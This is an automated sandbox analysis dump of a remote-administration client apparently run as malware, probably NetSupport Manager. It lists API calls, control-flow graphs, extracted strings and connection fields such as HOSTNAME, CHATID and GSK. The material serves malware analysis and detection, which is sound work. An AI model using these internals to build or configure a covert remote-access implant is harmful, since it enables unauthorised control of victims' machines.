                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                          • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                          • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                          • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                          • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                          • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                        • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                        • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                          • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                          • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                          • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                        • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                        • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                        • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                        • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                        • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                        • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                          • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                          • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                          • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                          • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                        • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                        • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                        • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                        • SetWindowPos.USER32(0003042E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                        • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                        • wsprintfA.USER32 ref: 1102FFA5
                                                                                        • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                          • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,461C6054,00000002,76232EE0), ref: 1112820A
                                                                                          • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                          • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$301389$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                        • API String ID: 1099283604-646960681
                                                                                        • Opcode ID: 0cb7a766abd34e2c29f6e790b2184919878d3f7c1274e6837e3e9d4553cc52ea
                                                                                        • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                        • Opcode Fuzzy Hash: 0cb7a766abd34e2c29f6e790b2184919878d3f7c1274e6837e3e9d4553cc52ea
                                                                                        • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1129 1102db00-1102db50 call 1110f420 1132 1102db52-1102db66 call 11142a60 1129->1132 1133 1102db68 1129->1133 1135 1102db6e-1102dbb3 call 11142290 call 11142ac0 1132->1135 1133->1135 1141 1102dd53-1102dd62 call 11144dc0 1135->1141 1142 1102dbb9 1135->1142 1148 1102dd68-1102dd78 1141->1148 1144 1102dbc0-1102dbc3 1142->1144 1146 1102dbc5-1102dbc7 1144->1146 1147 1102dbe8-1102dbf1 1144->1147 1149 1102dbd0-1102dbe1 1146->1149 1150 1102dbf7-1102dbfe 1147->1150 1151 1102dd24-1102dd3d call 11142ac0 1147->1151 1153 1102dd7a 1148->1153 1154 1102dd7f-1102dd93 call 1102cc10 1148->1154 1149->1149 1155 1102dbe3 1149->1155 1150->1151 1156 1102dcf3-1102dd08 call 11162de7 1150->1156 1157 1102dc05-1102dc07 1150->1157 1158 1102dd0a-1102dd1f call 11162de7 1150->1158 1159 1102dc9a-1102dccd call 111618c1 call 11142290 1150->1159 1160 1102dcdb-1102dcf1 call 11164010 1150->1160 1161 1102dc8b-1102dc95 1150->1161 1162 1102dccf-1102dcd9 1150->1162 1163 1102dc4c-1102dc52 1150->1163 1164 1102dc7c-1102dc86 1150->1164 1151->1144 1176 1102dd43-1102dd45 1151->1176 1153->1154 1180 1102dd98-1102dd9d 1154->1180 1155->1151 1156->1151 1157->1151 1168 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1157->1168 1158->1151 1159->1151 1160->1151 1161->1151 1162->1151 1170 1102dc54-1102dc68 call 11162de7 1163->1170 1171 1102dc6d-1102dc77 1163->1171 1164->1151 1168->1151 1170->1151 1171->1151 1184 1102de43-1102de5d call 111463d0 1176->1184 1185 1102dd4b-1102dd51 1176->1185 1180->1184 1187 1102dda3-1102ddc8 call 110b7920 call 11146450 1180->1187 1195 1102deb3-1102debf call 1102b4f0 1184->1195 1196 1102de5f-1102de78 call 1105dd10 1184->1196 1185->1141 1185->1148 1205 1102ddd3-1102ddd9 1187->1205 1206 1102ddca-1102ddd1 1187->1206 1208 1102dec1-1102dec8 1195->1208 1209 1102de98-1102de9f 1195->1209 1196->1195 1212 1102de7a-1102de8c 1196->1212 1210 1102dddb-1102dde2 call 11027d60 1205->1210 1211 1102de39 1205->1211 1206->1184 1213 1102dea5-1102dea8 1208->1213 1214 1102deca-1102ded4 1208->1214 1209->1213 1216 1102e0aa-1102e0cb GetComputerNameA 1209->1216 1210->1211 1224 1102dde4-1102de16 1210->1224 1211->1184 1212->1195 1225 1102de8e 1212->1225 1221 1102deaa-1102deb1 call 110b7920 1213->1221 1222 1102ded9 1213->1222 1214->1216 1218 1102e103-1102e109 1216->1218 1219 1102e0cd-1102e101 call 11027c30 1216->1219 1227 1102e10b-1102e110 1218->1227 1228 1102e13f-1102e152 call 11164010 1218->1228 1219->1218 1249 1102e157-1102e163 1219->1249 1223 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1221->1223 1222->1223 1278 1102e07a-1102e082 SetLastError 1223->1278 1279 1102dfbc-1102dfd3 1223->1279 1241 1102de20-1102de2f call 110f6080 1224->1241 1242 1102de18-1102de1e 1224->1242 1225->1209 1231 1102e116-1102e11a 1227->1231 1247 1102e347-1102e36a 1228->1247 1234 1102e136-1102e138 1231->1234 1235 1102e11c-1102e11e 1231->1235 1246 1102e13b-1102e13d 1234->1246 1244 1102e132-1102e134 1235->1244 1245 1102e120-1102e126 1235->1245 1251 1102de32-1102de34 call 1102d330 1241->1251 1242->1241 1242->1251 1244->1246 1245->1234 1248 1102e128-1102e130 1245->1248 1246->1228 1246->1249 1260 1102e392-1102e39a 1247->1260 1261 1102e36c-1102e372 1247->1261 1248->1231 1248->1244 1257 1102e165-1102e17a call 110b7920 call 11029bd0 1249->1257 1258 1102e17c-1102e18f call 11081a70 1249->1258 1251->1211 1286 1102e1d3-1102e1ec call 11081a70 1257->1286 1270 1102e191-1102e1b4 1258->1270 1271 1102e1b6-1102e1b8 1258->1271 1267 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1260->1267 1268 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1260->1268 1261->1260 1266 1102e374-1102e38d call 1102d330 1261->1266 1266->1260 1268->1267 1270->1286 1277 1102e1c0-1102e1d1 1271->1277 1277->1277 1277->1286 1284 1102e043-1102e04f 1278->1284 1279->1284 1295 1102dfd5-1102dfde 1279->1295 1292 1102e092-1102e0a1 1284->1292 1293 1102e051-1102e05d 1284->1293 1302 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1286->1302 1303 1102e32c-1102e339 call 11164010 1286->1303 1292->1216 1297 1102e0a3-1102e0a4 FreeLibrary 1292->1297 1299 1102e06f-1102e073 1293->1299 1300 1102e05f-1102e06d GetProcAddress 1293->1300 1295->1284 1304 1102dfe0-1102e016 call 11146450 call 1112b270 1295->1304 1297->1216 1305 1102e084-1102e086 SetLastError 1299->1305 1306 1102e075-1102e078 1299->1306 1300->1299 1341 1102e283-1102e299 call 11128ec0 1302->1341 1342 1102e26f-1102e27e call 11029450 1302->1342 1320 1102e33c-1102e341 CharUpperA 1303->1320 1304->1284 1324 1102e018-1102e03e call 11146450 call 11027920 1304->1324 1308 1102e08c 1305->1308 1306->1308 1308->1292 1320->1247 1324->1284 1346 1102e2b2-1102e2ec call 110d0bd0 * 2 1341->1346 1347 1102e29b-1102e2ad call 110d0bd0 1341->1347 1342->1341 1354 1102e302-1102e32a call 11164010 call 110d07c0 1346->1354 1355 1102e2ee-1102e2fd call 11029450 1346->1355 1347->1346 1354->1320 1355->1354
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc_memsetwsprintf
                                                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$301389$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 3802068140-1953357614
                                                                                        • Opcode ID: 42e7776b6859df5dacee09d9e1e89e67e5f5d15013712b0b0c2d6de332e02c97
                                                                                        • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                        • Opcode Fuzzy Hash: 42e7776b6859df5dacee09d9e1e89e67e5f5d15013712b0b0c2d6de332e02c97
                                                                                        • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1781 6d1d3d00-6d1d3d42 call 6d1e1c50 call 6d1d3b80 1785 6d1d3d47-6d1d3d4f 1781->1785 1786 6d1d3d6c-6d1d3d6e 1785->1786 1787 6d1d3d51-6d1d3d6b call 6d1e28e1 1785->1787 1789 6d1d3d87-6d1d3da1 call 6d1c8fb0 1786->1789 1790 6d1d3d70-6d1d3d84 call 6d1c6f50 1786->1790 1796 6d1d3dc5-6d1d3e44 call 6d1c5e90 * 2 call 6d1d7be0 call 6d1c5e20 lstrlenA 1789->1796 1797 6d1d3da3-6d1d3dc4 call 6d1c63c0 call 6d1e28e1 1789->1797 1790->1789 1810 6d1d3e98-6d1d3fbe call 6d1c5500 call 6d1c6050 call 6d1d7c70 * 2 call 6d1d7d00 * 3 call 6d1c5060 call 6d1d7d00 _free call 6d1d7d00 gethostname call 6d1d7d00 call 6d1cb8e0 1796->1810 1811 6d1d3e46-6d1d3e95 call 6d1dd8b0 call 6d1c5060 call 6d1c4830 _free 1796->1811 1842 6d1d3fc5-6d1d3fe1 call 6d1d7d00 1810->1842 1843 6d1d3fc0 1810->1843 1811->1810 1846 6d1d3ff8-6d1d3ffe 1842->1846 1847 6d1d3fe3-6d1d3ff5 call 6d1d7d00 1842->1847 1843->1842 1849 6d1d421a-6d1d4263 call 6d1d7b60 _free call 6d1c98d0 call 6d1d77e0 1846->1849 1850 6d1d4004-6d1d4022 call 6d1c5e20 1846->1850 1847->1846 1871 6d1d4265-6d1d4291 call 6d1ca4e0 call 6d1e28e1 1849->1871 1872 6d1d4292-6d1d42aa call 6d1e28e1 1849->1872 1857 6d1d405a-6d1d4084 call 6d1c5e20 1850->1857 1858 6d1d4024-6d1d4057 call 6d1c5060 call 6d1d7d00 _free 1850->1858 1865 6d1d408a-6d1d41ce call 6d1c5060 call 6d1d7d00 _free call 6d1c5e20 call 6d1c5060 call 6d1d7d00 _free call 6d1c5e20 call 6d1c5060 call 6d1d7d00 _free call 6d1c5e20 call 6d1c5060 call 6d1d7d00 _free 1857->1865 1866 6d1d41d1-6d1d4217 call 6d1d7d00 call 6d1c5e20 call 6d1d7d00 1857->1866 1858->1857 1865->1866 1866->1849
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: *Dept$*Gsk$1.1$301389$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                        • API String ID: 2102423945-4053615097
                                                                                        • Opcode ID: eb4583a5eea4e0b771ef7bc065ae5b39be478e70a505d9052da278a495b8b964
                                                                                        • Instruction ID: d9ee72862511c564d36860af2610d7cd28c0783d0cc663072b71a2007690cc92
                                                                                        • Opcode Fuzzy Hash: eb4583a5eea4e0b771ef7bc065ae5b39be478e70a505d9052da278a495b8b964
                                                                                        • Instruction Fuzzy Hash: 6BE1B2B2C4452C6ACB21DB60CC80FFFB3789F19209F4145CAF609A6146EBB45B84DFA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2006 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 2007 110a9cf8-110a9d09 SetupDiGetClassDevsA 2006->2007 2008 110a9e05-110a9e0d SetLastError 2006->2008 2009 110a9d0f-110a9d1d 2007->2009 2010 110a9f13-110a9f15 2007->2010 2013 110a9e19-110a9e1b SetLastError 2008->2013 2014 110a9d20-110a9d24 2009->2014 2011 110a9f1e-110a9f20 2010->2011 2012 110a9f17-110a9f18 FreeLibrary 2010->2012 2017 110a9f37-110a9f52 call 11161d01 2011->2017 2012->2011 2018 110a9e21-110a9e2c GetLastError 2013->2018 2015 110a9d3d-110a9d55 2014->2015 2016 110a9d26-110a9d37 GetProcAddress 2014->2016 2015->2018 2028 110a9d5b-110a9d5d 2015->2028 2016->2013 2016->2015 2020 110a9e32-110a9e3d call 11162be5 2018->2020 2021 110a9ec0-110a9ed1 GetProcAddress 2018->2021 2020->2014 2022 110a9edb-110a9edd SetLastError 2021->2022 2023 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 2021->2023 2027 110a9ee3-110a9ee5 2022->2027 2023->2027 2027->2010 2030 110a9ee7-110a9f09 CreateFileA 2027->2030 2031 110a9d68-110a9d6a 2028->2031 2032 110a9d5f-110a9d65 call 11162be5 2028->2032 2033 110a9f0b-110a9f10 call 11162be5 2030->2033 2034 110a9f22-110a9f2c call 11162be5 2030->2034 2036 110a9d6c-110a9d7f GetProcAddress 2031->2036 2037 110a9d85-110a9d9b 2031->2037 2032->2031 2033->2010 2046 110a9f2e-110a9f2f FreeLibrary 2034->2046 2047 110a9f35 2034->2047 2036->2037 2040 110a9e42-110a9e4a SetLastError 2036->2040 2045 110a9d9d-110a9da6 GetLastError 2037->2045 2048 110a9dac-110a9dbf call 11162b51 2037->2048 2040->2045 2045->2048 2049 110a9e81-110a9e92 call 110a9c30 2045->2049 2046->2047 2047->2017 2054 110a9ea2-110a9eb3 call 110a9c30 2048->2054 2055 110a9dc5-110a9dcd 2048->2055 2056 110a9e9b-110a9e9d 2049->2056 2057 110a9e94-110a9e95 FreeLibrary 2049->2057 2054->2056 2065 110a9eb5-110a9ebe FreeLibrary 2054->2065 2058 110a9dcf-110a9de2 GetProcAddress 2055->2058 2059 110a9de4-110a9dfb 2055->2059 2056->2017 2057->2056 2058->2059 2061 110a9e4f-110a9e51 SetLastError 2058->2061 2063 110a9e57-110a9e71 call 110a9c30 call 11162be5 2059->2063 2067 110a9dfd-110a9e00 2059->2067 2061->2063 2063->2056 2071 110a9e73-110a9e7c FreeLibrary 2063->2071 2065->2017 2067->2014 2071->2017
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(setupapi.dll,461C6054,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                        • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                        • _free.LIBCMT ref: 110A9D60
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                        • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                        • _malloc.LIBCMT ref: 110A9DB3
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                        • GetLastError.KERNEL32 ref: 110A9E21
                                                                                        • _free.LIBCMT ref: 110A9E33
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                        • _free.LIBCMT ref: 110A9E64
                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
